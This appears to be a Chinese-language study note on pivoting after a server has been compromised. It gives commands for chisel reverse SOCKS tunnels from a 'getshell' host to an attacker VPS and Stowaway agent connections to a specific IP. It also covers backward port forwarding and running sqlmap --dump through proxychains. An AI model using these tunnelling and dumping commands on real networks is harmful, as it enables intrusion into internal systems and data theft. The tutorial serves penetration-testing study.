端口转发和流量代理

这里流量代理使用工具的话是参考这个师傅的

fushuling

端口转发和流量代理

虽然这里我在thm学了 但是我感觉实践起来还是有点差别的

端口转发

端口转发通常是针对特定的端口进行配置和转发。您可以选择性地将特定端口的流量转发到目标主机的对应端口。例如，您可以将本地主机的端口80转发到远程主机的端口80，实现对远程主机上的Web服务的访问。但是端口转发并不限制只能转发一个端口，您可以根据需求进行多个端口的转发配置。

看这个的话 因为我们的攻击机的话是不能直接访问这个 服务器开放的端口的 我们就只能使能访问该端口的内网主机 来将端口转发出来给我们 这样的话我们的攻击机就能访问到该开放的端口

(记得在自己的攻击机上将端口开放出来 用于连接转发出来的端口)

流量代理

这个知识点的话就和我们使用的vpn来翻墙是一个道理的

代理可以处理多个端口的流量，并根据配置进行灵活的转发和处理。代理服务器可以接收来自客户端的请求，并将其转发到目标服务器，然后将响应返回给客户端。代理可以是基于特定协议（如HTTP代理、SOCKS代理）或应用层代理（如反向代理）。代理可以将不同端口的流量转发到不同的目标服务器上，根据具体的配置进行灵活的转发。

在我们拿下服务器后 因为在内网 有些服务是只能内网机器访问 我们是访问不到的 所以我们就想办法建立代理

代理的话就是让可控linux服务器作为代理服务器 然后让攻击机作为目标服务器 当我们使用攻击机来访问这个内网web服务的话 可控的这个linux服务器就会把流量转发到我们的目标服务器 使我们能过访问这个内网web服务

(其实就和我们的梯子是一个道理 如果我们直接访问youtube的是访问不成功的 如果我们开启vpn的话 就相当于让我们的windows主机作为目标服务器 当我们访问youtube的时候 流量就会通过这个vpn的服务器转发到我们的本机 然后我们就能访问这个youtube了)

代理搭建

这里我们进行流量代理的话使用的是 chisel这个工具 (重要的是使用的端口必须全部开放)

• 在我们主机的vps上运行

./chisel server -p 1234 --reverse

• 在这台已经getshell的机器上运行：

./chisel client vpsip:1234 R:0.0.0.0:7777:socks

• 然后连接这个vps:7777的socks5代理

• 最后即可在本地访问内网资源

代理抓包

进行socks5代理后还是可以进行抓包 就是套娃 让bp来进行socks5代理

然后抓8080端口

• 使用bp进行socks5代理

• 然后正常抓包抓取8080端口就行了

这样的话就可以了

Stowaway

先贴个地址

https://github.com/ph4ntonn/Stowaway

讲下用法

这里的话是先下载两个工具(根据自己的系统来)

下载服务器上

然后给权限后先运行

• 第一步

./linux_x64_admin -l 8000 监听8000端口

• 第二步 在getshell的主机上运行

./linux_x64_agent -c 101.42.39.110:8000

连接到主机服务器上的8000端口

• 第三步 开启代理和端口转发

use 0 是选择连接到8000端口的这个ip

socks 8080 是开启代理 配合使用proxifier就是全局代理了

backward 6060 6060 这个的话就是端口转发了 backward: 反向映射当前agent上的端口至admin的本地端口

//agent的话就是getshell主机上运行的

(这里如果我们想要不出网主机上线的话 就选择监听这个getshell主机内网ip + 6060端口)

然后主机运行我们就可以上线了

那么如果我们想要使用别的命令行工具怎么办 没关系 这次的话会用到proxychains4这个工具

proxychains4s使用

• 先进行配置文件的修改

vim /etc/proxychains4.conf

将配置文件末尾处的socks代理修改成自己的

• 然后就可以进行使用了

proxychains4 sqlmap -r time.txt --dump

这里演示的话是使用sqlmap工具 其他工具的话也是如此 看自己的需求

这里的话MSF的也是可以使用进行流量代理的 下次再试试